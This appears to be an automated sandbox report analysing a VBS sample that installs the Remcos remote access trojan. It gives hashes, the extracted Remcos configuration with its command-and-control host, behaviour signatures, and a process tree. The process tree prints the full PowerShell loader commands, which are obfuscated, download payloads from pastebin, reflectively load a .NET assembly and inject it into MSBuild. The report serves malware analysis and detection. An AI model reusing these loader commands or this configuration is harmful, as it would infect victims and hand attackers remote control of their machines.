Analysis
-
max time kernel
149s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
07/11/2024, 21:34
Static task
static1
Behavioral task
behavioral1
Sample
target.vbs
Resource
win7-20241010-en
General
-
Target
target.vbs
-
Size
6KB
-
MD5
2dffd2a836e52c50a0c917e46a5868a1
-
SHA1
af5fa54fbd090e1aae6502b5fa0ab00e3f4acd24
-
SHA256
83b9bc8d2f4ef6a85965de118a374157d1054dbfb5a1f57bdaafafaa3ec07f11
-
SHA512
e924755e2592980980d8431a63487dc650775f6b1296abf861d81beb70b01d82b83331cc9ce6c79cf8832db54ac2a4d20d4e2b510f9103e13115a8c8e58aacaa
-
SSDEEP
96:eqUcAePyt8dA+AkDvgsZqW7bBFhfH7HK0c3Dm7aGnGcdUd66VX7txI7ezF:99PZzDbN7bJvD1czm7lG0UdvjRzF
Malware Config
Extracted
https://pastebin.com/raw/J6uRjZrv
Extracted
remcos
Nt
sremc.duckdns.org:2404
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-29CPLV
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Blocklisted process makes network request 6 IoCs
flow pid Process 9 4016 powershell.exe 18 2180 powershell.exe 21 2180 powershell.exe 25 4016 powershell.exe 29 4016 powershell.exe 33 4016 powershell.exe -
pid Process 2704 powershell.exe 4016 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
flow ioc 17 bitbucket.org 18 bitbucket.org 25 bitbucket.org 5 pastebin.com 9 pastebin.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4016 set thread context of 5044 4016 powershell.exe 107 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4708 PING.EXE -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4708 PING.EXE -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 2704 powershell.exe 2704 powershell.exe 4016 powershell.exe 4016 powershell.exe 2180 powershell.exe 2180 powershell.exe 4016 powershell.exe 4016 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2704 powershell.exe Token: SeDebugPrivilege 4016 powershell.exe Token: SeDebugPrivilege 2180 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 5044 MSBuild.exe -
Suspicious use of WriteProcessMemory 23 IoCs
description pid Process procid_target PID 1540 wrote to memory of 2704 1540 WScript.exe 83 PID 1540 wrote to memory of 2704 1540 WScript.exe 83 PID 2704 wrote to memory of 4016 2704 powershell.exe 85 PID 2704 wrote to memory of 4016 2704 powershell.exe 85 PID 4016 wrote to memory of 5068 4016 powershell.exe 90 PID 4016 wrote to memory of 5068 4016 powershell.exe 90 PID 4016 wrote to memory of 4708 4016 powershell.exe 91 PID 4016 wrote to memory of 4708 4016 powershell.exe 91 PID 4016 wrote to memory of 2180 4016 powershell.exe 97 PID 4016 wrote to memory of 2180 4016 powershell.exe 97 PID 4016 wrote to memory of 2664 4016 powershell.exe 106 PID 4016 wrote to memory of 2664 4016 powershell.exe 106 PID 4016 wrote to memory of 2664 4016 powershell.exe 106 PID 4016 wrote to memory of 5044 4016 powershell.exe 107 PID 4016 wrote to memory of 5044 4016 powershell.exe 107 PID 4016 wrote to memory of 5044 4016 powershell.exe 107 PID 4016 wrote to memory of 5044 4016 powershell.exe 107 PID 4016 wrote to memory of 5044 4016 powershell.exe 107 PID 4016 wrote to memory of 5044 4016 powershell.exe 107 PID 4016 wrote to memory of 5044 4016 powershell.exe 107 PID 4016 wrote to memory of 5044 4016 powershell.exe 107 PID 4016 wrote to memory of 5044 4016 powershell.exe 107 PID 4016 wrote to memory of 5044 4016 powershell.exe 107
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\target.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1540 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT☹Hk☹cwB0☹GU☹bQ☹u☹E4☹ZQB0☹C4☹UwBl☹HI☹dgBp☹GM☹ZQBQ☹G8☹aQBu☹HQ☹TQBh☹G4☹YQBn☹GU☹cgBd☹Do☹OgBT☹GU☹YwB1☹HI☹aQB0☹Hk☹U☹By☹G8☹d☹Bv☹GM☹bwBs☹C☹☹PQ☹g☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBO☹GU☹d☹☹u☹FM☹ZQBj☹HU☹cgBp☹HQ☹eQBQ☹HI☹bwB0☹G8☹YwBv☹Gw☹V☹B5☹H☹☹ZQBd☹Do☹OgBU☹Gw☹cw☹x☹DI☹Ow☹k☹EM☹QwBS☹Gg☹bQ☹g☹D0☹I☹☹n☹Gg☹d☹B0☹H☹☹cw☹6☹C8☹LwBw☹GE☹cwB0☹GU☹YgBp☹G4☹LgBj☹G8☹bQ☹v☹HI☹YQB3☹C8☹Sg☹2☹HU☹UgBq☹Fo☹cgB2☹Cc☹I☹☹7☹CQ☹Zg☹g☹D0☹I☹☹o☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBJ☹E8☹LgBQ☹GE☹d☹Bo☹F0☹Og☹6☹Ec☹ZQB0☹FQ☹ZQBt☹H☹☹U☹Bh☹HQ☹a☹☹o☹Ck☹I☹☹r☹C☹☹JwBk☹Gw☹b☹☹w☹DE☹LgB0☹Hg☹d☹☹n☹Ck☹I☹☹7☹Ek☹bgB2☹G8☹awBl☹C0☹VwBl☹GI☹UgBl☹HE☹dQBl☹HM☹d☹☹g☹C0☹VQBS☹Ek☹I☹☹k☹EM☹QwBS☹Gg☹bQ☹g☹C0☹TwB1☹HQ☹RgBp☹Gw☹ZQ☹g☹CQ☹Zg☹g☹C0☹VQBz☹GU☹QgBh☹HM☹aQBj☹F☹☹YQBy☹HM☹aQBu☹Gc☹I☹☹7☹GM☹bQBk☹C4☹ZQB4☹GU☹I☹☹v☹GM☹I☹☹7☹H☹☹aQBu☹Gc☹I☹☹x☹DI☹Nw☹u☹D☹☹Lg☹w☹C4☹MQ☹g☹Ds☹c☹Bv☹Hc☹ZQBy☹HM☹a☹Bl☹Gw☹b☹☹u☹GU☹e☹Bl☹C☹☹LQBj☹G8☹bQBt☹GE☹bgBk☹C☹☹ew☹k☹GY☹I☹☹9☹C☹☹K☹Bb☹FM☹eQBz☹HQ☹ZQBt☹C4☹SQBP☹C4☹U☹Bh☹HQ☹a☹Bd☹Do☹OgBH☹GU☹d☹BU☹GU☹bQBw☹F☹☹YQB0☹Gg☹K☹☹p☹C☹☹Kw☹g☹Cc☹Z☹Bs☹Gw☹M☹☹x☹C4☹d☹B4☹HQ☹Jw☹p☹C☹☹Ow☹k☹FE☹U☹B0☹GE☹dg☹g☹D0☹I☹☹o☹C☹☹RwBl☹HQ☹LQBD☹G8☹bgB0☹GU☹bgB0☹C☹☹LQBQ☹GE☹d☹Bo☹C☹☹J☹Bm☹C☹☹KQ☹g☹Ds☹SQBu☹HY☹bwBr☹GU☹LQBX☹GU☹YgBS☹GU☹cQB1☹GU☹cwB0☹C☹☹LQBV☹FI☹SQ☹g☹CQ☹UQBQ☹HQ☹YQB2☹C☹☹LQBP☹HU☹d☹BG☹Gk☹b☹Bl☹C☹☹J☹Bm☹C☹☹LQBV☹HM☹ZQBC☹GE☹cwBp☹GM☹U☹Bh☹HI☹cwBp☹G4☹ZwB9☹C☹☹Ow☹k☹FE☹U☹B0☹GE☹dg☹g☹D0☹I☹☹o☹C☹☹RwBl☹HQ☹LQBD☹G8☹bgB0☹GU☹bgB0☹C☹☹LQBQ☹GE☹d☹Bo☹C☹☹J☹Bm☹C☹☹KQ☹g☹Ds☹J☹Bs☹HU☹bwBy☹H☹☹I☹☹9☹C☹☹Jw☹w☹Cc☹I☹☹7☹CQ☹e☹Bt☹HY☹bgBq☹C☹☹PQ☹g☹Cc☹JQBK☹Gs☹UQBh☹HM☹R☹Bm☹Gc☹cgBU☹Gc☹JQ☹n☹C☹☹OwBb☹EI☹eQB0☹GU☹WwBd☹F0☹I☹☹k☹Gc☹aQBr☹Hc☹eQ☹g☹D0☹I☹Bb☹HM☹eQBz☹HQ☹ZQBt☹C4☹QwBv☹G4☹dgBl☹HI☹d☹Bd☹Do☹OgBG☹HI☹bwBt☹EI☹YQBz☹GU☹Ng☹0☹FM☹d☹By☹Gk☹bgBn☹Cg☹I☹☹k☹FE☹U☹B0☹GE☹dg☹u☹HI☹ZQBw☹Gw☹YQBj☹GU☹K☹☹n☹CQ☹J☹☹n☹Cw☹JwBB☹Cc☹KQ☹g☹Ck☹I☹☹7☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBB☹H☹☹c☹BE☹G8☹bQBh☹Gk☹bgBd☹Do☹OgBD☹HU☹cgBy☹GU☹bgB0☹EQ☹bwBt☹GE☹aQBu☹C4☹T☹Bv☹GE☹Z☹☹o☹CQ☹ZwBp☹Gs☹dwB5☹Ck☹LgBH☹GU☹d☹BU☹Hk☹c☹Bl☹Cg☹JwBU☹GU☹a☹B1☹Gw☹YwBo☹GU☹cwBY☹Hg☹W☹B4☹Hg☹LgBD☹Gw☹YQBz☹HM☹MQ☹n☹Ck☹LgBH☹GU☹d☹BN☹GU☹d☹Bo☹G8☹Z☹☹o☹Cc☹TQBz☹HE☹QgBJ☹GI☹WQ☹n☹Ck☹LgBJ☹G4☹dgBv☹Gs☹ZQ☹o☹CQ☹bgB1☹Gw☹b☹☹s☹C☹☹WwBv☹GI☹agBl☹GM☹d☹Bb☹F0☹XQ☹g☹Cg☹Jw☹w☹C8☹VgB0☹HU☹d☹BQ☹C8☹Z☹☹v☹GU☹ZQ☹u☹GU☹d☹Bz☹GE☹c☹☹v☹C8☹OgBz☹H☹☹d☹B0☹Gg☹Jw☹g☹Cw☹I☹☹k☹Hg☹bQB2☹G4☹ag☹g☹Cw☹I☹☹n☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹Xw☹t☹C0☹LQ☹t☹C0☹LQ☹t☹Cc☹L☹☹g☹CQ☹b☹B1☹G8☹cgBw☹Cw☹I☹☹n☹DE☹Jw☹s☹C☹☹JwBS☹G8☹Z☹Bh☹Cc☹I☹☹p☹Ck☹Ow☹=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('☹','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\Admin\AppData\Local\Temp\target.vbs');powershell $Yolopolhggobek;2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$luorp = '0' ;$xmvnj = 'C:\Users\Admin\AppData\Local\Temp\target.vbs' ;[Byte[]] $gikwy = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($gikwy).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/VtutP/d/ee.etsap//:sptth' , $xmvnj , '____________________________________________-------', $luorp, '1', 'Roda' ));"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4016 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c4⤵PID:5068
-
-
C:\Windows\system32\PING.EXE"C:\Windows\system32\PING.EXE" 127.0.0.14⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4708
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2180
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:2664
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5044
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD58fea7e437f05257eee06bd40b113fdf8
SHA162751708ee1783878cd7c73513974d92d3a61025
SHA256e7c1ebb39309ea8e3b60f5bc433ce4c775e5d77046579d884be1632a55700369
SHA51269ec5f704743de553d3a3a5db9613e2910e9de766e56ec1e9af2d32599ad94be69d139fe45980e94e0435ea031b13e1c06e1d515941e86a35128cf3c48b2a846
-
Filesize
3KB
MD5223bd4ae02766ddc32e6145fd1a29301
SHA1900cfd6526d7e33fb4039a1cc2790ea049bc2c5b
SHA2561022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e
SHA512648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc
-
Filesize
1KB
MD55c9d2cbff87039dfa98390f51b06f61b
SHA1736a64968f091a0fc9b987a45faf66f5f0bf6cd4
SHA256b3ff6eac7e6d3f70f21d63f5a34e04322d71319e27bb433f4496663337bf3251
SHA51243831a52799e14bee975a825342ffb51003e12597b664e18918b690f5f8781ab92f7f63428ee29aad05a3c386af5604e0cd0ca8df228b676a9da047fed51a3dd
-
Filesize
64B
MD55caad758326454b5788ec35315c4c304
SHA13aef8dba8042662a7fcf97e51047dc636b4d4724
SHA25683e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA5124e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
57B
MD51a215af591b42d73d0254846ebf5ef21
SHA13a8f8d81abcf9c65a62c1bc043e669a6894a0177
SHA256cdd976e886d1c89734decad2d084c76ee8fcd54a652195114478519af8bcdd18
SHA512df7c33b6bc1953f9c859793d707aec6f2ee8dd03c7ad8e1437f448567961e254f0864cbc363528a30b994c6dff6e9a0d156290432053bb56d55e0da3b3b42ea3
-
Filesize
102KB
MD5ed284d77b4400b2bcf8b0abbda2c8f90
SHA1c9f8e86ac04eef36be0e46caf815d33afa743756
SHA256c9b5f3f368d8497c092c270328f5ffc136121415190062b5a449ce4ecaec4ecd
SHA512459808753f7a6f2bdbe145c56ba1f0fa1e7e92afc6fc4b94c3a7c9627598347f73c6e38aeb7ecac2d298ba78e0cdab9792a47ce9d9f36e1b975b857f1a421437